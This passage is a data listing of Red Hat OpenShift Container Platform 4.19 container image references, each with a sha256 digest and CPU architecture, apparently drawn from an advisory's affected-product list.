"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
